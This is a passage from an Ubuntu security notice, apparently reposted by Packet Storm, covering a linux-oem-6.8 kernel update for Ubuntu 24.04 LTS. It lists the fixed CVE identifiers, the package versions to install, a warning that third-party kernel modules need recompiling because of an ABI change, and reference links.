CVE-2024-38578, CVE-2024-38582,CVE-2024-38588, CVE-2024-38579, CVE-2024-38617, CVE-2024-36901,CVE-2024-38550, CVE-2023-52882, CVE-2024-38603, CVE-2024-38620,CVE-2024-36956, CVE-2024-36880, CVE-2024-36895, CVE-2024-36979,CVE-2024-36887, CVE-2024-27396, CVE-2024-27400, CVE-2024-36952,CVE-2024-36886, CVE-2024-36905, CVE-2024-36883, CVE-2024-38540,CVE-2024-38605, CVE-2024-36029, CVE-2024-36934, CVE-2024-27395,CVE-2024-36000, CVE-2024-38549, CVE-2024-35999, CVE-2024-38585,CVE-2024-38589, CVE-2024-38565, CVE-2024-36917, CVE-2024-36930,CVE-2024-36940, CVE-2024-36900, CVE-2024-35850, CVE-2024-38592,CVE-2024-38553, CVE-2024-36929, CVE-2024-36915, CVE-2024-36004,CVE-2024-38573, CVE-2024-36941, CVE-2024-38607, CVE-2024-36009,CVE-2024-27398, CVE-2024-36909, CVE-2024-35848, CVE-2024-36950,CVE-2024-38564, CVE-2024-36947, CVE-2024-38613, CVE-2024-38570,CVE-2024-38612, CVE-2024-38580, CVE-2024-38557, CVE-2024-36959,CVE-2024-27399, CVE-2024-41011, CVE-2024-36928, CVE-2024-38543,CVE-2024-38541, CVE-2024-38583, CVE-2024-35855, CVE-2024-38611,CVE-2024-36891, CVE-2024-38587, CVE-2024-35851, CVE-2024-38546,CVE-2024-38596, CVE-2024-35998, CVE-2024-35991, CVE-2024-36965,CVE-2024-36925, CVE-2024-36894, CVE-2024-38567, CVE-2024-38572,CVE-2024-36882, CVE-2024-38594, CVE-2024-38563, CVE-2024-38616,CVE-2024-36951, CVE-2024-36005, CVE-2024-42134, CVE-2024-38602,CVE-2024-36014, CVE-2024-38601, CVE-2024-36001, CVE-2024-38575,CVE-2024-27401, CVE-2024-36961, CVE-2024-38576, CVE-2024-36935,CVE-2024-36893, CVE-2024-38562, CVE-2024-36904, CVE-2024-36939,CVE-2024-38591, CVE-2024-38539, CVE-2024-36030, CVE-2024-36920,CVE-2024-39482, CVE-2024-36977, CVE-2024-36013, CVE-2024-35856,CVE-2024-36922, CVE-2024-36033, CVE-2024-35859, CVE-2024-36919,CVE-2024-35846, CVE-2024-36913, CVE-2024-35854, CVE-2024-36924,CVE-2024-38547, CVE-2024-38551, CVE-2024-36899, CVE-2024-36932,CVE-2024-38545, CVE-2024-36966, CVE-2024-36911, CVE-2024-36946,CVE-2024-36906, CVE-2024-38595, CVE-2024-36012, CVE-2024-38552,CVE-2024-36933, CVE-2024-36936, CVE-2024-38548, CVE-2024-38558,CVE-2024-36006, CVE-2024-36908, CVE-2024-36892, CVE-2024-35988,CVE-2024-35993, CVE-2024-36914, CVE-2024-36896, CVE-2024-38615,CVE-2024-36890, CVE-2024-36969, CVE-2024-38559, CVE-2024-36964,CVE-2024-38560, CVE-2024-38574, CVE-2024-36962, CVE-2024-38542,CVE-2024-36926, CVE-2024-36968, CVE-2024-36032, CVE-2024-38544,CVE-2024-36938, CVE-2024-38597, CVE-2024-38577, CVE-2024-36958,CVE-2024-36945, CVE-2024-36943, CVE-2024-38610, CVE-2024-36927,CVE-2024-38554, CVE-2024-38555, CVE-2024-36031, CVE-2024-36011,CVE-2024-38569, CVE-2024-35847, CVE-2024-36921, CVE-2024-38606,CVE-2024-35949, CVE-2024-35947, CVE-2024-36889, CVE-2024-36884,CVE-2024-36954, CVE-2024-36902, CVE-2024-36007, CVE-2024-38586,CVE-2024-36918, CVE-2024-38571, CVE-2024-36955, CVE-2024-36888,CVE-2024-38556, CVE-2024-38604, CVE-2024-27394, CVE-2024-38600,CVE-2024-35983, CVE-2024-38568, CVE-2024-38566, CVE-2024-35853,CVE-2024-35858, CVE-2024-36910, CVE-2024-36903, CVE-2024-36881,CVE-2024-36937, CVE-2024-36957, CVE-2024-36912, CVE-2024-36948,CVE-2024-36953, CVE-2024-35996, CVE-2024-36963, CVE-2024-36923,CVE-2024-35852, CVE-2024-38598, CVE-2024-36003, CVE-2024-35986,CVE-2024-38584)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS   linux-image-6.8.0-1010-oem      6.8.0-1010.10   linux-image-oem-24.04           6.8.0-1010.10   linux-image-oem-24.04a          6.8.0-1010.10After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6955-1   CVE-2023-52882, CVE-2024-27394, CVE-2024-27395, CVE-2024-27396,   CVE-2024-27398, CVE-2024-27399, CVE-2024-27400, CVE-2024-27401,   CVE-2024-35846, CVE-2024-35847, CVE-2024-35848, CVE-2024-35849,   CVE-2024-35850, CVE-2024-35851, CVE-2024-35852, CVE-2024-35853,   CVE-2024-35854, CVE-2024-35855, CVE-2024-35856, CVE-2024-35857,   CVE-2024-35858, CVE-2024-35859, CVE-2024-35947, CVE-2024-35949,   CVE-2024-35983, CVE-2024-35986, CVE-2024-35987, CVE-2024-35988,   CVE-2024-35989, CVE-2024-35991, CVE-2024-35993, CVE-2024-35994,   CVE-2024-35996, CVE-2024-35998, CVE-2024-35999, CVE-2024-36000,   CVE-2024-36001, CVE-2024-36002, CVE-2024-36003, CVE-2024-36004,   CVE-2024-36005, CVE-2024-36006, CVE-2024-36007, CVE-2024-36009,   CVE-2024-36011, CVE-2024-36012, CVE-2024-36013, CVE-2024-36014,   CVE-2024-36017, CVE-2024-36028, CVE-2024-36029, CVE-2024-36030,   CVE-2024-36031, CVE-2024-36032, CVE-2024-36033, CVE-2024-36880,   CVE-2024-36881, CVE-2024-36882, CVE-2024-36883, CVE-2024-36884,   CVE-2024-36886, CVE-2024-36887, CVE-2024-36888, CVE-2024-36889,   CVE-2024-36890, CVE-2024-36891, CVE-2024-36892, CVE-2024-36893,   CVE-2024-36894, CVE-2024-36895, CVE-2024-36896, CVE-2024-36898,   CVE-2024-36899, CVE-2024-36900, CVE-2024-36901, CVE-2024-36902,   CVE-2024-36903, CVE-2024-36904, CVE-2024-36905, CVE-2024-36906,   CVE-2024-36908, CVE-2024-36909, CVE-2024-36910, CVE-2024-36911,   CVE-2024-36912, CVE-2024-36913, CVE-2024-36914, CVE-2024-36915,   CVE-2024-36916, CVE-2024-36917, CVE-2024-36918, CVE-2024-36919,   CVE-2024-36920, CVE-2024-36921, CVE-2024-36922, CVE-2024-36923,   CVE-2024-36924, CVE-2024-36925, CVE-2024-36926, CVE-2024-36927,   CVE-2024-36928, CVE-2024-36929, CVE-2024-36930, CVE-2024-36931,   CVE-2024-36932, CVE-2024-36933, CVE-2024-36934, CVE-2024-36935,   CVE-2024-36936, CVE-2024-36937, CVE-2024-36938, CVE-2024-36939,   CVE-2024-36940, CVE-2024-36941, CVE-2024-36943, CVE-2024-36944,   CVE-2024-36945, CVE-2024-36946, CVE-2024-36947, CVE-2024-36948,   CVE-2024-36949, CVE-2024-36950, CVE-2024-36951, CVE-2024-36952,   CVE-2024-36953, CVE-2024-36954, CVE-2024-36955, CVE-2024-36956,   CVE-2024-36957, CVE-2024-36958, CVE-2024-36959, CVE-2024-36960,   CVE-2024-36961, CVE-2024-36962, CVE-2024-36963, CVE-2024-36964,   CVE-2024-36965, CVE-2024-36966, CVE-2024-36967, CVE-2024-36968,   CVE-2024-36969, CVE-2024-36975, CVE-2024-36977, CVE-2024-36979,   CVE-2024-38538, CVE-2024-38539, CVE-2024-38540, CVE-2024-38541,   CVE-2024-38542, CVE-2024-38543, CVE-2024-38544, CVE-2024-38545,   CVE-2024-38546, CVE-2024-38547, CVE-2024-38548, CVE-2024-38549,   CVE-2024-38550, CVE-2024-38551, CVE-2024-38552, CVE-2024-38553,   CVE-2024-38554, CVE-2024-38555, CVE-2024-38556, CVE-2024-38557,   CVE-2024-38558, CVE-2024-38559, CVE-2024-38560, CVE-2024-38561,   CVE-2024-38562, CVE-2024-38563, CVE-2024-38564, CVE-2024-38565,   CVE-2024-38566, CVE-2024-38567, CVE-2024-38568, CVE-2024-38569,   CVE-2024-38570, CVE-2024-38571, CVE-2024-38572, CVE-2024-38573,   CVE-2024-38574, CVE-2024-38575, CVE-2024-38576, CVE-2024-38577,   CVE-2024-38578, CVE-2024-38579, CVE-2024-38580, CVE-2024-38582,   CVE-2024-38583, CVE-2024-38584, CVE-2024-38585, CVE-2024-38586,   CVE-2024-38587, CVE-2024-38588, CVE-2024-38589, CVE-2024-38590,   CVE-2024-38591, CVE-2024-38592, CVE-2024-38593, CVE-2024-38594,   CVE-2024-38595, CVE-2024-38596, CVE-2024-38597, CVE-2024-38598,   CVE-2024-38599, CVE-2024-38600, CVE-2024-38601, CVE-2024-38602,   CVE-2024-38603, CVE-2024-38604, CVE-2024-38605, CVE-2024-38606,   CVE-2024-38607, CVE-2024-38610, CVE-2024-38611, CVE-2024-38612,   CVE-2024-38613, CVE-2024-38614, CVE-2024-38615, CVE-2024-38616,   CVE-2024-38617, CVE-2024-38620, CVE-2024-39482, CVE-2024-41011,   CVE-2024-42134Package Information:   https://launchpad.net/ubuntu/+source/linux-oem-6.8/6.8.0-1010.10

Source

Packet Storm